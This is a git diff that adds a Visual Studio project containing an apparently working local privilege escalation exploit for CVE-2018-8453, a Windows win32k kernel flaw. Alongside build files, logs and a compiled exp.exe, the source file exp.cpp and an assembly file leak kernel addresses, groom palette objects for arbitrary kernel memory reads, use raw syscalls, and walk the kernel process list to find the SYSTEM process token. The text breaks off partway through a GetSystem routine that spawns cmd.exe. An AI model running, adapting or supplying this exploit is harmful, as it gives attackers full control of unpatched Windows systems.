diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj b/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj
new file mode 100644
index 0000000..a14a258
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj
@@ -0,0 +1,169 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}
+ Win32Proj
+ exp
+ 8.1
+
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj.filters b/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj.filters
new file mode 100644
index 0000000..48effbf
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/exp.vcxproj.filters
@@ -0,0 +1,41 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.cpp b/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.cpp
new file mode 100644
index 0000000..f026e66
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : ֻ�����������ļ���Դ�ļ�
+// exp.pch ����ΪԤ����ͷ
+// stdafx.obj ������Ԥ����������Ϣ
+
+#include "stdafx.h"
+
+// TODO: �� STDAFX.H �������κ�����ĸ���ͷ�ļ���
+//�������ڴ��ļ�������
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.h b/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.h
new file mode 100644
index 0000000..baa4bbc
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : ��ϵͳ�����ļ��İ����ļ���
+// ���Ǿ���ʹ�õ��������ĵ�
+// �ض�����Ŀ�İ����ļ�
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include
+#include
+
+
+
+// TODO: �ڴ˴����ó�����Ҫ������ͷ�ļ�
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/targetver.h b/CVE-2018-8453/exp_x64_palette_length/exp/targetver.h
new file mode 100644
index 0000000..416cebf
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// ���� SDKDDKVer.h ��������õ���߰汾�� Windows ƽ̨��
+
+// ���ҪΪ��ǰ�� Windows ƽ̨����Ӧ�ó�������� WinSDKVer.h������
+// �� _WIN32_WINNT ������ΪҪ֧�ֵ�ƽ̨��Ȼ���ٰ��� SDKDDKVer.h��
+
+#include
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/_asm.obj b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/_asm.obj
new file mode 100644
index 0000000..64aa53c
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/_asm.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.Build.CppClean.log b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.Build.CppClean.log
new file mode 100644
index 0000000..94d0dcc
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.Build.CppClean.log
@@ -0,0 +1,17 @@
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.pch
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\vc140.pdb
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\stdafx.obj
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.obj
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\_asm.obj
+c:\users\ze0r\desktop\exp_x64_palette_length\x64\release\exp.pdb
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\exp.write.1u.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link-cvtres.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link-cvtres.write.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link-rc.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link-rc.write.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_length\exp\x64\release\exp.tlog\link.write.1.tlog
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.log b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.log
new file mode 100644
index 0000000..ea5b9f3
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.log
@@ -0,0 +1,18 @@
+ Assembling _asm.asm...
+ stdafx.cpp
+ exp.cpp
+exp.cpp(93): warning C4311: “类型转换”: 从“BYTE *”到“unsigned int”的指针截断
+exp.cpp(93): warning C4302: “类型转换”: 从“BYTE *”到“unsigned int”截断
+exp.cpp(93): warning C4311: “类型转换”: 从“HMODULE”到“unsigned int”的指针截断
+exp.cpp(93): warning C4302: “类型转换”: 从“HMODULE”到“unsigned int”截断
+exp.cpp(192): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 1 拥有了类型“ULONG64”
+exp.cpp(192): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 2 拥有了类型“ULONG64”
+exp.cpp(282): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 1 拥有了类型“ULONG64”
+exp.cpp(306): warning C4101: “pKernelHandleTable”: 未引用的局部变量
+ 正在生成代码
+ 0 of 20 functions ( 0.0%) were compiled, the rest were copied from previous compilation.
+ 0 functions were new in current compilation
+ 0 functions had inline decision re-evaluated but remain unchanged
+ 已完成代码的生成
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp_x64_palette_length\x64\Release\exp.exe
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp_x64_palette_length\x64\Release\exp.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.obj b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.obj
new file mode 100644
index 0000000..c602fbd
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.pch b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.pch
new file mode 100644
index 0000000..9de3777
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.pch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..67c22b8
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..5d13205
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..2a6bfa9
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..5875596
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Release|x64|C:\Users\ze0r\Desktop\exp_x64_palette_length\|
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.write.1u.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.write.1u.tlog
new file mode 100644
index 0000000..fdef7ef
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/exp.write.1u.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..7773d58
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..0e7bfd3
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..cdf252f
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/stdafx.obj b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/stdafx.obj
new file mode 100644
index 0000000..230a86a
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/stdafx.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/vc140.pdb b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/vc140.pdb
new file mode 100644
index 0000000..0b0508d
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp/x64/Release/vc140.pdb differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4c98b977.ipch b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4c98b977.ipch
new file mode 100644
index 0000000..070307e
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4c98b977.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch
new file mode 100644
index 0000000..5f7d0c6
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-c8e60a99.ipch b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-c8e60a99.ipch
new file mode 100644
index 0000000..532b888
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-7a579913/EXP-c8e60a99.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-a3e8b7c3/EXP-4dbe2bb1.ipch b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-a3e8b7c3/EXP-4dbe2bb1.ipch
new file mode 100644
index 0000000..367ec86
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/ipch/EXP-a3e8b7c3/EXP-4dbe2bb1.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/x64/Release/exp.exe b/CVE-2018-8453/exp_x64_palette_length/x64/Release/exp.exe
new file mode 100644
index 0000000..c319701
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/x64/Release/exp.exe differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/.vs/exp/v14/.suo b/CVE-2018-8453/exp_x64_palette_paddress/.vs/exp/v14/.suo
new file mode 100644
index 0000000..4c1e4f3
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/.vs/exp/v14/.suo differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp.VC.db b/CVE-2018-8453/exp_x64_palette_paddress/exp.VC.db
new file mode 100644
index 0000000..1da6474
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp.VC.db differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp.sln b/CVE-2018-8453/exp_x64_palette_paddress/exp.sln
new file mode 100644
index 0000000..49eb848
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exp", "exp\exp.vcxproj", "{34B233E1-7209-49FD-8DB8-69A9C75906D6}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x64.ActiveCfg = Debug|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x64.Build.0 = Debug|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x86.ActiveCfg = Debug|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x86.Build.0 = Debug|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x64.ActiveCfg = Release|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x64.Build.0 = Release|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x86.ActiveCfg = Release|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/ReadMe.txt b/CVE-2018-8453/exp_x64_palette_paddress/exp/ReadMe.txt
new file mode 100644
index 0000000..5b66131
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/ReadMe.txt
@@ -0,0 +1,30 @@
+========================================================================
+ 控制台应用程序:exp 项目概述
+========================================================================
+
+应用程序向导已为您创建了此 exp 应用程序。
+
+本文件概要介绍组成 exp 应用程序的每个文件的内容。
+
+
+exp.vcxproj
+ 这是使用应用程序向导生成的 VC++ 项目的主项目文件,其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
+
+exp.vcxproj.filters
+ 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。它包含有关项目文件与筛选器之间的关联信息。在 IDE 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。例如,“.cpp”文件与“源文件”筛选器关联。
+
+exp.cpp
+ 这是主应用程序源文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他标准文件:
+
+StdAfx.h, StdAfx.cpp
+ 这些文件用于生成名为 exp.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他注释:
+
+应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
+
+/////////////////////////////////////////////////////////////////////////////
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/_asm.asm b/CVE-2018-8453/exp_x64_palette_paddress/exp/_asm.asm
new file mode 100644
index 0000000..e3a8637
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/_asm.asm
@@ -0,0 +1,36 @@
+public GetKernelCallbackTableBase
+public FuncInt3
+public SetWindowFNID
+_TEXT SEGMENT
+
+GetKernelCallbackTableBase PROC
+ ;int 3
+ mov rax,gs:[60h]
+ lea rax,[rax+58h]
+ mov rax,[rax]
+ ret
+GetKernelCallbackTableBase ENDP
+
+FuncInt3 PROC
+ int 3
+ ret
+FuncInt3 ENDP
+
+SetWindowFNID PROC
+ mov r10,rcx;
+ mov r11,rdx;
+ mov eax,1095h;
+ syscall;
+ ret;
+SetWindowFNID ENDP
+
+SetLinkedUFIs PROC
+ mov r10,rcx;
+ mov eax,12EAh;
+ syscall;
+ ret;
+SetLinkedUFIs ENDP
+
+END
+
+
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.cpp b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.cpp
new file mode 100644
index 0000000..1890bd8
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.cpp
@@ -0,0 +1,416 @@
+#include "stdafx.h"
+#include
+#include
+#include
+#include
+#pragma comment(lib, "Psapi.lib")
+
+BOOL bMSGSENT = FALSE;
+HWND hMainWND;
+HWND hSBWND;
+HWND hSBWNDnew;
+HWND hReuseWND;
+
+HPALETTE hManager;
+HPALETTE hWorker;
+ULONG64 MgrAddr, WrkAddr;
+ULONG64 CurrentTagCLSAddr;
+
+CHAR SBTrackBUF[0x80];
+TCHAR MenuName[0xff0];
+HDC hDC_Writer[3000];
+ACCEL acckey[0x0D] = { 0 };
+HACCEL hAccels[1000];
+HACCEL hAccel;
+
+typedef void*(NTAPI *lHMValidateHandle)(HWND h, int type);
+lHMValidateHandle pHmValidateHandle = NULL;
+
+typedef unsigned __int64 QWORD, *PQWORD;
+typedef QWORD DT;
+
+typedef struct _HEAD
+{
+ HANDLE h;
+ DWORD cLockObj;
+} HEAD, *PHEAD;
+
+typedef struct _THROBJHEAD
+{
+ HEAD h;
+ PVOID pti;
+} THROBJHEAD, *PTHROBJHEAD;
+
+typedef struct _THRDESKHEAD
+{
+ THROBJHEAD h;
+ PULONG64 rpdesk;
+ ULONG64 pSelf; // points to the kernel mode address
+} THRDESKHEAD, *PTHRDESKHEAD;
+
+typedef struct
+{
+ QWORD UniqueProcessIdOffset;
+ QWORD TokenOffset;
+} VersionSpecificConfig;
+
+VersionSpecificConfig gConfig = { 0x2e0, 0x358 };
+
+EXTERN_C PULONG64 GetKernelCallbackTableBase();
+EXTERN_C VOID FuncInt3();
+EXTERN_C VOID SetWindowFNID(HWND hWnd, LONG64 FNID);
+EXTERN_C VOID SetLinkedUFIs(HDC hDC,PULONG64 addr, LONG64 length);
+
+typedef ULONG64(WINAPI *fct_fnDispatch64)(PULONG64);
+fct_fnDispatch64 fnDWORD, fnClientFreeWindowClassExtraBytes;
+
+BOOL FindHMValidateHandle() {
+ HMODULE hUser32 = LoadLibraryA("user32.dll");
+ if (hUser32 == NULL) {
+ printf("Failed to load user32");
+ return FALSE;
+ }
+
+ BYTE* pIsMenu = (BYTE *)GetProcAddress(hUser32, "IsMenu");
+ if (pIsMenu == NULL) {
+ printf("Failed to find location of exported function 'IsMenu' within user32.dll\n");
+ return FALSE;
+ }
+ unsigned int uiHMValidateHandleOffset = 0;
+ for (unsigned int i = 0; i < 0x1000; i++) {
+ BYTE* test = pIsMenu + i;
+ if (*test == 0xE8) {
+ uiHMValidateHandleOffset = i + 1;
+ break;
+ }
+ }
+ if (uiHMValidateHandleOffset == 0) {
+ printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n");
+ return FALSE;
+ }
+
+ unsigned int addr = *(unsigned int *)(pIsMenu + uiHMValidateHandleOffset);
+ unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr;
+ pHmValidateHandle = (lHMValidateHandle)((ULONG_PTR)hUser32 + offset + 11);
+
+ return TRUE;
+}
+
+HPALETTE CreatePaletteOfSize(int size, DWORD value) {
+ int pal_cnt = (size - 0x90) / 4;
+ int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+ LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+ memset(lPalette, value, palsize);
+ lPalette->palNumEntries = pal_cnt;
+ lPalette->palVersion = 0x300;
+ return CreatePalette(lPalette);
+}
+
+ULONG64 alloccate_free_window()
+{
+ HMODULE hInst = GetModuleHandleA(0);
+ TCHAR strclassname[32] = { 0x41 };
+ WNDCLASSEX wnd = { 0x0 };
+ wnd.cbSize = sizeof(wnd);
+ wnd.lpszClassName = strclassname;
+ wnd.lpfnWndProc = DefWindowProc;
+ wnd.hInstance = hInst;
+ wnd.lpszMenuName = MenuName;
+ RegisterClassExW(&wnd);
+
+ HWND hTmpWnd = CreateWindowEx(
+ 0,
+ wnd.lpszClassName,
+ TEXT("WORDS"),
+ 0xcf0000,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ NULL, NULL, hInst, NULL);
+ PTHRDESKHEAD tagWND = (PTHRDESKHEAD)pHmValidateHandle(hTmpWnd, 1);
+ ULONG64 p = (ULONG64)tagWND;
+ ULONG64 kernellpSelp = tagWND->pSelf;
+ ULONG64 ulClientDelta = kernellpSelp - p;
+ ULONG64 kernelTagCLS = *(ULONG64*)(p + 0xa8);
+ ULONG64 userTagCLS = kernelTagCLS - ulClientDelta;
+ ULONG64 tagCLS_lpszMenuName = (ULONG64)(*((ULONG64*)(userTagCLS + 0x98)));
+ DestroyWindow(hTmpWnd);
+ UnregisterClass(strclassname, hInst);
+ return tagCLS_lpszMenuName;
+}
+
+ULONG64 GetMangerPalette()
+{
+ ULONG64 Previous, Current;
+ Previous = alloccate_free_window();
+ while (TRUE)
+ {
+ Current = alloccate_free_window();
+ if ((Current == Previous) && (Current != 0))
+ {
+ hManager = CreatePaletteOfSize(0xfe8,0x88);
+ return Current;
+ }
+ Previous = Current;
+ }
+}
+
+ULONG64 GetWorkerPalette()
+{
+ ULONG64 Previous, Current;
+ Previous = alloccate_free_window();
+ while (TRUE)
+ {
+ Current = alloccate_free_window();
+ if (Current == Previous && Current != 0)
+ {
+ hWorker = CreatePaletteOfSize(0xfe8, 0x88);
+ return Current;
+ }
+ Previous = Current;
+ }
+}
+
+VOID GetMangerAndWorker()
+{
+ MgrAddr = GetMangerPalette();
+ WrkAddr = GetWorkerPalette();
+ printf("[*] Manager: 0x%p\n[*] Worker: 0x%p\n", MgrAddr, WrkAddr);
+ memset(SBTrackBUF, 0x44, 0x80);
+ *(PULONG64)(SBTrackBUF + sizeof(ULONG64)) = 0;
+ *(PULONG64)(SBTrackBUF + sizeof(ULONG64) + sizeof(ULONG64)) = MgrAddr + 0x79 - 8 ;
+ //*(PULONG64)(SBTrackBUF + sizeof(ULONG64)) = MgrAddr + 0x16;
+ //*(PULONG64)(SBTrackBUF + sizeof(ULONG64) + sizeof(ULONG64)) = MgrAddr + 0x16;
+}
+
+VOID ReadMem(ULONG64 Addr, DWORD len,PULONG64 ret) {
+ ULONG64 tmp = Addr;
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)&tmp);
+ GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)ret);
+}
+
+ULONG64 GetNTOsBase()
+{
+ ULONG64 Bases[0x1000];
+ DWORD needed = 0;
+ ULONG64 krnlbase = 0;
+ if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+ krnlbase = Bases[0];
+ }
+ return krnlbase;
+}
+
+ULONG64 PsInitialSystemProcess()
+{
+ ULONG64 Module = (ULONG64)LoadLibraryA("ntoskrnl.exe");
+ ULONG64 Addr = (ULONG64)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+ FreeLibrary((HMODULE)Module);
+ ULONG64 res = 0;
+ ULONG64 ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ ReadMem(Addr - Module + ntOsBase, 2 ,&res);
+ }
+ return res;
+}
+
+ULONG64 PsGetCurrentProcess(QWORD sysEPS)
+{
+ ULONG64 pEPROCESS = sysEPS;
+ ULONG64 Flink = 0;
+ ULONG64 PID = 0;
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), 2, &Flink);
+ while (TRUE) {
+ pEPROCESS = Flink - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 2,&PID);
+ if (GetCurrentProcessId() == PID) {
+ return pEPROCESS;
+ }
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), 2, &Flink);
+ }
+}
+
+ULONG64 AllocSBTrackMem() {
+
+ TCHAR strMenuName[98];
+ memset(strMenuName, 0x55, 98);
+
+ TCHAR strclassname[0x32] = { 0x11 };
+ HMODULE hInst = GetModuleHandleA(0);
+ WNDCLASSEX wnd = { 0x0 };
+ wnd.cbSize = sizeof(wnd);
+ wnd.lpszClassName = strclassname;
+ wnd.lpfnWndProc = DefWindowProc;
+ wnd.hInstance = hInst;
+ wnd.lpszMenuName = strMenuName;
+ RegisterClassExW(&wnd);
+
+ hReuseWND = CreateWindowEx(
+ 0,
+ wnd.lpszClassName,
+ TEXT("WORDS"),
+ 0xcf0000,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ NULL, NULL, hInst, NULL);
+ PTHRDESKHEAD tagWND = (PTHRDESKHEAD)pHmValidateHandle(hReuseWND, 1);
+ ULONG64 p = (ULONG64)tagWND;
+ ULONG64 kernellpSelp = tagWND->pSelf;
+ ULONG64 ulClientDelta = kernellpSelp - p;
+ ULONG64 kernelTagCLS = *(ULONG64*)(p + 0xa8);
+ CurrentTagCLSAddr = kernelTagCLS;
+ ULONG64 userTagCLS = kernelTagCLS - ulClientDelta;
+ ULONG64 tagCLS_lpszMenuName = (ULONG64)(*((ULONG64*)(userTagCLS + 0x98)));
+ printf("[*] MenuName: 0x%p\n", tagCLS_lpszMenuName);
+ return tagCLS_lpszMenuName;
+}
+
+VOID SetupManger()
+{
+ QWORD buf[20];
+ ZeroMemory(buf, 20 * sizeof(QWORD));
+ GetPaletteEntries(hManager, 30, 40, (LPPALETTEENTRY)buf);
+ buf[15] = WrkAddr + 0x78;
+ SetPaletteEntries(hManager, 30, 40, (LPPALETTEENTRY)buf);
+}
+
+void GetSystem()
+{
+ ULONG64 SelfToken = 0;
+ ULONG64 SystemToken = 0;
+ ULONG64 SystemEPS;
+ ULONG64 CurrentEPS;
+
+ STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+ PROCESS_INFORMATION pProcessInfo;
+ WCHAR cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+ SystemEPS = PsInitialSystemProcess();
+ CurrentEPS = PsGetCurrentProcess(SystemEPS);
+
